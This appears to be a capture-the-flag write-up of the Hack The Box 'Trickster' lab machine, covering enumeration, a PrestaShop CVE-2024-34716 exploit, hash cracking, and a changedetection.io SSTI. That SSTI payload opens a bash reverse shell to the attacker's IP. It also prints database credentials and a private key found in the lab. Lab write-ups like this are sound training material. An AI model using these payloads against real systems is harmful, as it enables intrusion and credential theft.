Trickster
Synopsis
Trickster is a medium linux machine created by EmSec. The subdomin shop.trickster.htb uses PrestaShop version 8.1.5 which is vulnerable to CVE-2024-34716 XSS vulnerability which gives us the shell as www-data. The mysql
database contains the james hash which is crackable. The docker container is running and port 5000 of docker container is running the changedetection.io version 0.45.20 which is vulnerable to CVE-2024-32651 SSTI vulnerability which allows the RCE. The docker container contains the Backups directory with .br file which contains the adam's credentials. The adam is allowed to execute prusaslicer
which is vulnerable to CVE-2023-47268 arbitrary code execution vulnerability which gives us shell as root.
Linux
Medium
30
21-09-2024
01-02-2025
Enumeration
Nmap
Started the nmap
scan and found ssh and http services running.
nmap -p- -Pn -sC -sV --min-rate=1000 10.10.11.34
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-30 19:17 EST
Warning: 10.10.11.34 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.34
Host is up (0.55s latency).
Not shown: 64272 closed tcp ports (conn-refused), 1261 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 8c:01:0e:7b:b4:da:b7:2f:bb:2f:d3:a3:8c:a6:6d:87 (ECDSA)
|_ 256 90:c6:f3:d8:3f:96:99:94:69:fe:d3:72:cb:fe:6c:c5 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://trickster.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: _; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 199.07 seconds
Add the trickster.htb domain in /etc/hosts file.
Web - trickster.htb
The trickster is a online shopping platform where we can shop to all our shopping needs.

VIsiting the contact and shop endpoints, the contact form and shop.trickster.htb subdomain is found.
Add the shop.trickster.htb in /etc/hosts file.
Web - shop.trickster.htb
The subdomain has listed some of the products and we can buy it or add to cart.

The website is made using the prestashop. The prestashop is a open-source software platform to build the e-commerce websites.

Directory enumeration using fuff
reveals the .git directory.
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u http://shop.trickster.htb/FUZZ -mc 200
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://shop.trickster.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200
________________________________________________
.git/config [Status: 200, Size: 112, Words: 11, Lines: 8, Duration: 884ms]
.git/HEAD [Status: 200, Size: 28, Words: 2, Lines: 2, Duration: 970ms]
.git/logs/ [Status: 200, Size: 1137, Words: 77, Lines: 18, Duration: 971ms]
.git/index [Status: 200, Size: 252177, Words: 733, Lines: 978, Duration: 539ms]
:: Progress: [4723/4723] :: Job [1/1] :: 52 req/sec :: Duration: [0:01:22] :: Errors: 0 ::
Using gitdumper
to dump the content in .git directory.
git-dumper http://shop.trickster.htb .git
Listing the contents in .git directory reveals the prestashop admin panel path.
admin634ewutrx1jgitlooaj Install_PrestaShop.html INSTALL.txt LICENSES Makefile

The 8.1.5 version of prestashop is vulnerable to XSS via customer contact, the details about the vulnerability is released by prestashop in their github repository.
Foothold
Shell - www-data [ CVE-2024-34716 Exploit ]
The aelmokhtar has published the script in github repository for exploiting the vulnerability. Git clone the repository.
git clone https://github.com/aelmokhtar/CVE-2024-34716
Cloning into 'CVE-2024-34716'...
remote: Enumerating objects: 60, done.
remote: Counting objects: 100% (60/60), done.
remote: Compressing objects: 100% (42/42), done.
remote: Total 60 (delta 30), reused 34 (delta 13), pack-reused 0 (from 0)
Receiving objects: 100% (60/60), 6.71 MiB | 782.00 KiB/s, done.
Resolving deltas: 100% (30/30), done.
Change directory to CVE-2024-34716 and run the exploit.py.
python3 exploit.py -h
usage: exploit.py [-h] --url URL --email EMAIL --local-ip LOCAL_IP
--admin-path ADMIN_PATH
CVE-2024-34716 Exploit
options:
-h, --help show this help message and exit
--url URL The Presta Shop base url.
--email EMAIL The email address of admin user.
--local-ip LOCAL_IP Local HTTP Server IP.
--admin-path ADMIN_PATH
The Presta Shop admin path.
python3 exploit.py --url http://shop.trickster.htb --email dexter@mail.com --local-ip 10.10.16.19 --admin-path admin634ewutrx1jgitlooaj
[X] Starting exploit with:
Url: http://shop.trickster.htb
Email: dexter@mail.com
Local IP: 10.10.16.19
Admin Path: admin634ewutrx1jgitlooaj
[X] Ncat is now listening on port 12345. Press Ctrl+C to terminate.
Serving at http.Server on port 5000
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:12345
Ncat: Listening on 0.0.0.0:12345
GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403
Request: GET /ps_next_8_theme_malicious.zip HTTP/1.1
Response: 200 -
10.10.11.34 - - [02/Feb/2025 04:25:54] "GET /ps_next_8_theme_malicious.zip HTTP/1.1" 200 -
GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403
Ncat: Connection from 10.10.11.34:50560.
Linux trickster 5.15.0-121-generic #131-Ubuntu SMP Fri Aug 9 08:29:53 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
09:26:29 up 18:25, 0 users, load average: 0.02, 0.16, 0.14
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Lateral Movement
Pillaging - www-data [ user ]
The prestashop config file parameters.php gives us the credentials for mysql
database.
$ pwd
/var/www/prestashop/app/config
<?php return array (
'parameters' =>
array (
'database_host' => '127.0.0.1',
'database_port' => '',
'database_name' => 'prestashop',
'database_user' => 'ps_user',
'database_password' => 'prest@shop_o',
'database_prefix' => 'ps_',
'database_engine' => 'InnoDB',
'mailer_transport' => 'smtp',
'mailer_host' => '127.0.0.1',
'mailer_user' => NULL,
'mailer_password' => NULL,
'secret' => 'eHPDO7bBZPjXWbv3oSLIpkn5XxPvcvzt7ibaHTgWhTBM3e7S9kbeB1TPemtIgzog',
'ps_caching' => 'CacheMemcache',
'ps_cache_enable' => false,
'ps_creation_date' => '2024-05-25',
'locale' => 'en-US',
'use_debug_toolbar' => true,
'cookie_key' => '8PR6s1SJZLPCjXTegH7fXttSAXbG2h6wfCD3cLk5GpvkGAZ4K9hMXpxBxrf7s42i',
'cookie_iv' => 'fQoIWUoOLU0hiM2VmI1KPY61DtUsUx8g',
'new_cookie_key' => 'def000001a30bb7f2f22b0a7790f2268f8c634898e0e1d32444c3a03f4040bd5e8cb44bdb57a73f70e01cf83a38ec5d2ddc1741476e83c45f97f763e7491cc5e002aff47',
'api_public_key' => '-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuSFQP3xrZccKbS/VGKMr
v8dF4IJh9F9NvmPZqiFNpJnBHhfWE3YVM/OrEREGKztkHFsQGUZXFIwiBQVs5kAG
5jfw+hQrl89+JRD0ogZ+OHUfN/CgmM2eq1H/gxAYfcRfwjSlOh2YzAwpLvwtYXBt
Scu6QqRAdotokqW2m3aMt+LV8ERdFsBkj+/OVdJ8oslvSt6Kgf39DnBpGIXAqaFc
QdMdq+1lT9oiby0exyUkl6aJU21STFZ7kCf0Secp2f9NoaKoBwC9m707C2UCNkAm
B2A2wxf88BDC7CtwazwDW9QXdF987RUzGj9UrEWwTwYEcJcV/hNB473bcytaJvY1
ZQIDAQAB
-----END PUBLIC KEY-----
',
'api_private_key' => '-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQC5IVA/fGtlxwpt
L9UYoyu/x0XggmH0X02+Y9mqIU2kmcEeF9YTdhUz86sREQYrO2QcWxAZRlcUjCIF
BWzmQAbmN/D6FCuXz34lEPSiBn44dR838KCYzZ6rUf+DEBh9xF/CNKU6HZjMDCku
/C1hcG1Jy7pCpEB2i2iSpbabdoy34tXwRF0WwGSP785V0nyiyW9K3oqB/f0OcGkY
hcCpoVxB0x2r7WVP2iJvLR7HJSSXpolTbVJMVnuQJ/RJ5ynZ/02hoqgHAL2bvTsL
ZQI2QCYHYDbDF/zwEMLsK3BrPANb1Bd0X3ztFTMaP1SsRbBPBgRwlxX+E0Hjvdtz
K1om9jVlAgMBAAECggEAD5CTdKL7TJVNdRyeZ/HgDcGtSFDt92PD34v5kuo14u7i
Y6tRXlWBNtr3uPmbcSsPIasuUVGupJWbjpyEKV+ctOJjKkNj3uGdE3S3fJ/bINgI
BeX/OpmfC3xbZSOHS5ulCWjvs1EltZIYLFEbZ6PSLHAqesvgd5cE9b9k+PEgp50Q
DivaH4PxfI7IKLlcWiq2mBrYwsWHIlcaN0Ys7h0RYn7OjhrPr8V/LyJLIlapBeQV
Geq6MswRO6OXfLs4Rzuw17S9nQ0PDi4OqsG6I2tm4Puq4kB5CzqQ8WfsMiz6zFU/
UIHnnv9jrqfHGYoq9g5rQWKyjxMTlKA8PnMiKzssiQKBgQDeamSzzG6fdtSlK8zC
TXHpssVQjbw9aIQYX6YaiApvsi8a6V5E8IesHqDnS+s+9vjrHew4rZ6Uy0uV9p2P
MAi3gd1Gl9mBQd36Dp53AWik29cxKPdvj92ZBiygtRgTyxWHQ7E6WwxeNUWwMR/i
4XoaSFyWK7v5Aoa59ECduzJm1wKBgQDVFaDVFgBS36r4fvmw4JUYAEo/u6do3Xq9
JQRALrEO9mdIsBjYs9N8gte/9FAijxCIprDzFFhgUxYFSoUexyRkt7fAsFpuSRgs
+Ksu4bKxkIQaa5pn2WNh1rdHq06KryC0iLbNii6eiHMyIDYKX9KpByaGDtmfrsRs
uxD9umhKIwKBgECAXl/+Q36feZ/FCga3ave5TpvD3vl4HAbthkBff5dQ93Q4hYw8
rTvvTf6F9900xo95CA6P21OPeYYuFRd3eK+vS7qzQvLHZValcrNUh0J4NvocxVVn
RX6hWcPpgOgMl1u49+bSjM2taV5lgLfNaBnDLoamfEcEwomfGjYkGcPVAoGBAILy
1rL84VgMslIiHipP6fAlBXwjQ19TdMFWRUV4LEFotdJavfo2kMpc0l/ZsYF7cAq6
fdX0c9dGWCsKP8LJWRk4OgmFlx1deCjy7KhT9W/fwv9Fj08wrj2LKXk20n6x3yRz
O/wWZk3wxvJQD0XS23Aav9b0u1LBoV68m1WCP+MHAoGBANwjGWnrY6TexCRzKdOQ
K/cEIFYczJn7IB/zbB1SEC19vRT5ps89Z25BOu/hCVRhVg9bb5QslLSGNPlmuEpo
HfSWR+q1UdaEfABY59ZsFSuhbqvC5gvRZVQ55bPLuja5mc/VvPIGT/BGY7lAdEbK
6SMIa53I2hJz4IMK4vc2Ssqq
-----END PRIVATE KEY-----
',
),
);
Shell - james
Upgrading the shell and using the credentials to login into mysql
.
$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@trickster:~/prestashop/app/config$ ^Z
[1] + 214361 suspended python3 exploit.py --url http://shop.trickster.htb --email dexter@mail.com
stty raw -echo; fg
[1] + 214361 continued python3 exploit.py --url http://shop.trickster.htb --email dexter@mail.com
www-data@trickster:~/prestashop/app/config$
www-data@trickster:~/prestashop/app/config$ mysql -u ps_user -p prest@shop_o
Enter password:
ERROR 1044 (42000): Access denied for user 'ps_user'@'localhost' to database 'prest@shop_o'
www-data@trickster:~/prestashop/app/config$ mysql -u ps_user -p prestashop
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 26924
Server version: 10.6.18-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [prestashop]>
Enumerating the database gives us the james hash which we can use it into ssh
.
MariaDB [prestashop]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| prestashop |
+--------------------+
2 rows in set (0.001 sec)
MariaDB [prestashop]> use prestashop;
Database changed
MariaDB [prestashop]> show tables;
+-------------------------------------------------+
| Tables_in_prestashop |
+-------------------------------------------------+
| ps_access |
| ps_accessory |
| ps_address |
| ps_address_format |
| ps_admin_filter |
| ps_alias |
| ps_api_access |
| ps_attachment |
| ps_attachment_lang |
| ps_attribute |
| ps_attribute_group |
| ps_attribute_group_lang |
| ps_attribute_group_shop |
| ps_attribute_lang |
| ps_attribute_shop |
| ps_authorization_role |
| ps_authorized_application |
| ps_blockwishlist_statistics |
| ps_carrier |
| ps_carrier_group |
| ps_carrier_lang |
| ps_carrier_shop |
| ps_carrier_tax_rules_group_shop |
| ps_carrier_zone |
| ps_cart |
| ps_cart_cart_rule |
| ps_cart_product |
| ps_cart_rule |
| ps_cart_rule_carrier |
| ps_cart_rule_combination |
| ps_cart_rule_country |
| ps_cart_rule_group |
| ps_cart_rule_lang |
| ps_cart_rule_product_rule |
| ps_cart_rule_product_rule_group |
| ps_cart_rule_product_rule_value |
| ps_cart_rule_shop |
| ps_category |
| ps_category_group |
| ps_category_lang |
| ps_category_product |
| ps_category_shop |
| ps_cms |
| ps_cms_category |
| ps_cms_category_lang |
| ps_cms_category_shop |
| ps_cms_lang |
| ps_cms_role |
| ps_cms_role_lang |
| ps_cms_shop |
| ps_configuration |
| ps_configuration_kpi |
| ps_configuration_kpi_lang |
| ps_configuration_lang |
| ps_connections |
| ps_connections_page |
| ps_connections_source |
| ps_contact |
| ps_contact_lang |
| ps_contact_shop |
| ps_country |
| ps_country_lang |
| ps_country_shop |
| ps_currency |
| ps_currency_lang |
| ps_currency_shop |
| ps_customer |
| ps_customer_group |
| ps_customer_message |
| ps_customer_message_sync_imap |
| ps_customer_session |
| ps_customer_thread |
| ps_customization |
| ps_customization_field |
| ps_customization_field_lang |
| ps_customized_data |
| ps_date_range |
| ps_delivery |
| ps_emailsubscription |
| ps_employee |
| ps_employee_session |
| ps_employee_shop |
| ps_feature |
| ps_feature_flag |
| ps_feature_lang |
| ps_feature_product |
| ps_feature_shop |
| ps_feature_value |
| ps_feature_value_lang |
| ps_ganalytics |
| ps_ganalytics_data |
| ps_gender |
| ps_gender_lang |
| ps_group |
| ps_group_lang |
| ps_group_reduction |
| ps_group_shop |
| ps_gsitemap_sitemap |
| ps_guest |
| ps_homeslider |
| ps_homeslider_slides |
| ps_homeslider_slides_lang |
| ps_hook |
| ps_hook_alias |
| ps_hook_module |
| ps_hook_module_exceptions |
| ps_image |
| ps_image_lang |
| ps_image_shop |
| ps_image_type |
| ps_import_match |
| ps_info |
| ps_info_lang |
| ps_info_shop |
| ps_lang |
| ps_lang_shop |
| ps_layered_category |
| ps_layered_filter |
| ps_layered_filter_block |
| ps_layered_filter_shop |
| ps_layered_indexable_attribute_group |
| ps_layered_indexable_attribute_group_lang_value |
| ps_layered_indexable_attribute_lang_value |
| ps_layered_indexable_feature |
| ps_layered_indexable_feature_lang_value |
| ps_layered_indexable_feature_value_lang_value |
| ps_layered_price_index |
| ps_layered_product_attribute |
| ps_link_block |
| ps_link_block_lang |
| ps_link_block_shop |
| ps_linksmenutop |
| ps_linksmenutop_lang |
| ps_log |
| ps_mail |
| ps_mailalert_customer_oos |
| ps_manufacturer |
| ps_manufacturer_lang |
| ps_manufacturer_shop |
| ps_memcached_servers |
| ps_message |
| ps_message_readed |
| ps_meta |
| ps_meta_lang |
| ps_module |
| ps_module_access |
| ps_module_carrier |
| ps_module_country |
| ps_module_currency |
| ps_module_group |
| ps_module_history |
| ps_module_preference |
| ps_module_shop |
| ps_operating_system |
| ps_order_carrier |
| ps_order_cart_rule |
| ps_order_detail |
| ps_order_detail_tax |
| ps_order_history |
| ps_order_invoice |
| ps_order_invoice_payment |
| ps_order_invoice_tax |
| ps_order_message |
| ps_order_message_lang |
| ps_order_payment |
| ps_order_return |
| ps_order_return_detail |
| ps_order_return_state |
| ps_order_return_state_lang |
| ps_order_slip |
| ps_order_slip_detail |
| ps_order_state |
| ps_order_state_lang |
| ps_orders |
| ps_pack |
| ps_page |
| ps_page_type |
| ps_page_viewed |
| ps_pagenotfound |
| ps_product |
| ps_product_attachment |
| ps_product_attribute |
| ps_product_attribute_combination |
| ps_product_attribute_image |
| ps_product_attribute_lang |
| ps_product_attribute_shop |
| ps_product_carrier |
| ps_product_comment |
| ps_product_comment_criterion |
| ps_product_comment_criterion_category |
| ps_product_comment_criterion_lang |
| ps_product_comment_criterion_product |
| ps_product_comment_grade |
| ps_product_comment_report |
| ps_product_comment_usefulness |
| ps_product_country_tax |
| ps_product_download |
| ps_product_group_reduction_cache |
| ps_product_lang |
| ps_product_sale |
| ps_product_shop |
| ps_product_supplier |
| ps_product_tag |
| ps_profile |
| ps_profile_lang |
| ps_psgdpr_consent |
| ps_psgdpr_consent_lang |
| ps_psgdpr_log |
| ps_psreassurance |
| ps_psreassurance_lang |
| ps_quick_access |
| ps_quick_access_lang |
| ps_range_price |
| ps_range_weight |
| ps_request_sql |
| ps_required_field |
| ps_risk |
| ps_risk_lang |
| ps_search_engine |
| ps_search_index |
| ps_search_word |
| ps_shop |
| ps_shop_group |
| ps_shop_url |
| ps_smarty_cache |
| ps_smarty_last_flush |
| ps_smarty_lazy_cache |
| ps_specific_price |
| ps_specific_price_priority |
| ps_specific_price_rule |
| ps_specific_price_rule_condition |
| ps_specific_price_rule_condition_group |
| ps_state |
| ps_statssearch |
| ps_stock |
| ps_stock_available |
| ps_stock_mvt |
| ps_stock_mvt_reason |
| ps_stock_mvt_reason_lang |
| ps_store |
| ps_store_lang |
| ps_store_shop |
| ps_supplier |
| ps_supplier_lang |
| ps_supplier_shop |
| ps_supply_order |
| ps_supply_order_detail |
| ps_supply_order_history |
| ps_supply_order_receipt_history |
| ps_supply_order_state |
| ps_supply_order_state_lang |
| ps_tab |
| ps_tab_lang |
| ps_tab_module_preference |
| ps_tag |
| ps_tag_count |
| ps_tax |
| ps_tax_lang |
| ps_tax_rule |
| ps_tax_rules_group |
| ps_tax_rules_group_shop |
| ps_timezone |
| ps_translation |
| ps_warehouse |
| ps_warehouse_carrier |
| ps_warehouse_product_location |
| ps_warehouse_shop |
| ps_web_browser |
| ps_webservice_account |
| ps_webservice_account_shop |
| ps_webservice_permission |
| ps_wishlist |
| ps_wishlist_product |
| ps_wishlist_product_cart |
| ps_zone |
| ps_zone_shop |
+-------------------------------------------------+
276 rows in set (0.001 sec)
MariaDB [prestashop]> SELECT firstname, lastname ,email, passwd FROM ps_employee;
+-----------+----------+---------------------+--------------------------------------------------------------+
| firstname | lastname | email | passwd |
+-----------+----------+---------------------+--------------------------------------------------------------+
| Trickster | Store | admin@trickster.htb | $2y$10$P8wO3jruKKpvKRgWP6o7o.rojbDoABG9StPUt0dR7LIeK26RdlB/C |
| james | james | james@trickster.htb | $2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm |
+-----------+----------+---------------------+--------------------------------------------------------------+
2 rows in set (0.000 sec)
MariaDB [prestashop]>
Cracked the james hash using hashcat
.
hashcat -a 0 -m 3200 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-haswell-AMD Ryzen 3 7320U with Radeon Graphics, 2553/5170 MB (1024 MB allocatable), 8MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm:alwaysandforever
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6y...yunCmm
Time.Started.....: Sun Feb 2 05:45:30 2025 (4 secs)
Time.Estimated...: Sun Feb 2 05:45:34 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 8821 H/s (6.76ms) @ Accel:8 Loops:16 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 37056/14344385 (0.26%)
Rejected.........: 0/37056 (0.00%)
Restore.Point....: 36992/14344385 (0.26%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-16
Candidate.Engine.: Device Generator
Candidates.#1....: boazona -> Yankees
Hardware.Mon.#1..: Temp: 73c Util: 95%
Started: Sun Feb 2 05:45:26 2025
Stopped: Sun Feb 2 05:45:36 2025
ssh james@10.10.11.34
The authenticity of host '10.10.11.34 (10.10.11.34)' can't be established.
ED25519 key fingerprint is SHA256:SZyh4Oq8EYrDd5T2R0ThbtNWVAlQWg+Gp7XwsR6zq7o.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.34' (ED25519) to the list of known hosts.
james@10.10.11.34's password:
Last login: Sun Feb 2 04:19:21 2025 from 10.10.14.7
james@trickster:~$
Pivoting
Pillaging - james [ user ]
The ps aux
reveals that the root is running Docker container and changedetection.py in /datastore directory.
james@trickster:~$ ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.3 166548 11920 ? Ss Feb01 0:13 /sbin/init
----- SNIP -----
root 199684 0.0 0.3 1238144 12756 ? Sl 01:00 0:00 /usr/bin/containerd-shim-runc-v2 -namespace moby -id a4b9a36ae7ffc48c2b451ead77f93a8572869906f386773c3de52
root 199704 0.4 1.8 1300332 74168 ? Ssl 01:00 0:01 python ./changedetection.py -d /datastore
----- SNIP -----
runner 200150 0.1 0.0 0 0 ? Z 01:05 0:00 [chromedriver] <defunct>
james 200236 0.0 0.0 10072 1604 pts/1 R+ 01:06 0:00 ps aux
The ip addr
reveals the Docker container network interface configuration and its IP address.
james@trickster:~$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:73:b3 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.10.11.34/23 brd 10.10.11.255 scope global eth0
valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:04:bf:9f:0d brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
209: veth484e19f@if208: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether 0e:e7:8b:7f:b2:ce brd ff:ff:ff:ff:ff:ff link-netnsid 0
The ping sweep is used to find the active and listening ip addresses in docker container. The two ip addresses are active and listening 172.17.0.1 and 172.17.0.2
james@trickster:~$ for i in {1..254}; do (ping -c 1 172.17.0.$i | grep ttl &) ; done
64 bytes from 172.17.0.1: icmp_seq=1 ttl=64 time=0.071 ms
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.048 ms
The port scan finds the 5000 port open.
james@trickster:~$ for port in {1..65535}; do echo > /dev/tcp/172.17.0.2/$port && echo "$port open"; done 2>/dev/null
5000 open
Pillaging - Port 5000
Curling the 5000 port the changedetection version 0.45.20 service is running in the website.
james@trickster:~$ curl -L http://172.17.0.2:5000
<!DOCTYPE html>
<html lang="en" data-darkmode="false">
<head>
<meta charset="utf-8" >
<meta name="viewport" content="width=device-width, initial-scale=1.0" >
<meta name="description" content="Self hosted website change detection." >
<title>Change Detection</title>
<link rel="alternate" type="application/rss+xml" title="Changedetection.io » Feed" href="/rss?tag=&token=" >
<link rel="stylesheet" href="/static/styles/pure-min.css" >
<link rel="stylesheet" href="/static/styles/styles.css?v=0.45.20" >
----- SNIP -----
Port forward the 5000 port via ssh
.
ssh -L 5000:172.17.0.2:5000 james@10.10.11.34
james@10.10.11.34's password:
Last login: Mon Feb 3 01:02:16 2025 from 10.10.16.19
james@trickster:~$
The Login page of changedetection.io is presented with password field.

Using the password of james will give us access to the changedetection.

Shell - Docker Container [ root - CVE-2024-32651 changedetection SSTI ]
The changedetection is the open source web page change detection, website watcher, restock monitor and notification service. The source code and documentation is found in this github repository. The changedetection version <= 0.45.20 is vulnerable to CVE-2024-32651 Server Side Template Injection in Jinja2 which allows the RCE. More details and PoC is found here.
Following the above PoC with below given payloads gives us the shell of root in Docker Container.
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash -c "bash -i >& /dev/tcp/10.10.16.19/8443 0>&1"').read() }}
Settings > Notification > Insert your payload > click on Send test notification

nc -lvnp 8443
Listening on 0.0.0.0 8443
Connection received on 10.10.11.34 53796
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@a4b9a36ae7ff:/app#
Pillaging - root [ user - Docker Container ]
Enumerating the /datastore directory, found the Backup directory which contains the zip files.
root@a4b9a36ae7ff:/app# cd /datastore
cd /datastore
root@a4b9a36ae7ff:/datastore# ls
ls
Backups
b86f1003-3ecb-4125-b090-27e15ca605b9
bbdd78f6-db98-45eb-9e7b-681a0c60ea34
secret.txt
url-list-with-tags.txt
url-list.txt
url-watches.json
root@a4b9a36ae7ff:/datastore# cd Backups
cd Backups
root@a4b9a36ae7ff:/datastore/Backups# ls
ls
changedetection-backup-20240830194841.zip
changedetection-backup-20240830202524.zip
root@a4b9a36ae7ff:/datastore/Backups#
The nc
and unzip
is not present in the system.
Shell - adam
I will be using tar to compress the Backups directory and use base64
to convert it into base64.
root@ae5c137aa8ef:/datastore/Backups# cd ..
cd ..
root@ae5c137aa8ef:/# tar czf datastore.tar.gz Backups/
tar czf datastore.tar.gz Backups/
root@a4b9a36ae7ff:/datastore# base64 datastore.tar.gz -w0
base64 datastore.tar.gz -w0
Copy the outputted base64
text and save it into the file in your local machine. Then decompile the base64 and decompress it using tar
.
base64 -d backup > backups.tar.gz
tar -xvf backups.tar.gz
Backups/
Backups/changedetection-backup-20240830202524.zip
Backups/changedetection-backup-20240830194841.zip
Change directory into Backups directory and unzipping the first file contains the .br file.
cd Backups
unzip changedetection-backup-20240830194841.zip
Archive: changedetection-backup-20240830194841.zip
creating: b4a8b52d-651b-44bc-bbc6-f9e8c6590103/
extracting: b4a8b52d-651b-44bc-bbc6-f9e8c6590103/f04f0732f120c0cc84a993ad99decb2c.txt.br
extracting: b4a8b52d-651b-44bc-bbc6-f9e8c6590103/history.txt
inflating: secret.txt
inflating: url-list.txt
inflating: url-list-with-tags.txt
inflating: url-watches.json
The brotli
command is used to decompress the .br file. If not present in your system apt install
to get it.
cd b4a8b52d-651b-44bc-bbc6-f9e8c6590103
brotli -d f04f0732f120c0cc84a993ad99decb2c.txt.br
cat f04f0732f120c0cc84a993ad99decb2c.txt
This website requires JavaScript.
Explore Help
Register Sign In
james/prestashop
Watch 1
Star 0
Fork 0
You've already forked prestashop
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
main
prestashop / app / config / parameters.php
james 8ee5eaf0bb prestashop
2024-08-30 20:35:25 +01:00
64 lines
3.1 KiB
PHP
Raw Permalink Blame History
< ? php return array (
'parameters' =>
array (
'database_host' => '127.0.0.1' ,
'database_port' => '' ,
'database_name' => 'prestashop' ,
'database_user' => 'adam' ,
'database_password' => '' ,
'database_prefix' => 'ps_' ,
'database_engine' => 'InnoDB' ,
'mailer_transport' => 'smtp' ,
'mailer_host' => '127.0.0.1' ,
'mailer_user' => NULL ,
'mailer_password' => NULL ,
'secret' => 'eHPDO7bBZPjXWbv3oSLIpkn5XxPvcvzt7ibaHTgWhTBM3e7S9kbeB1TPemtIgzog' ,
'ps_caching' => 'CacheMemcache' ,
'ps_cache_enable' => false ,
'ps_creation_date' => '2024-05-25' ,
'locale' => 'en-US' ,
'use_debug_toolbar' => true ,
'cookie_key' => '8PR6s1SCD3cLk5GpvkGAZ4K9hMXpx2h6wfCD3cLk5GpvkGAZ4K9hMXpxBxrf7s42i' ,
'cookie_iv' => 'fQoIWUoOLU0hiM2VmI1KPY61DtUsUx8g' ,
'new_cookie_key' => 'def000001a30bb7f2f22b0a7790f2268f8c634898e0e1d32444c3a03fbb7f2fb57a73f70e01cf83a38ec5d2ddc1741476e83c45f97f763e7491cc5e002aff47' ,
'api_public_key' => '-----BEGIN PUBLIC KEY-----
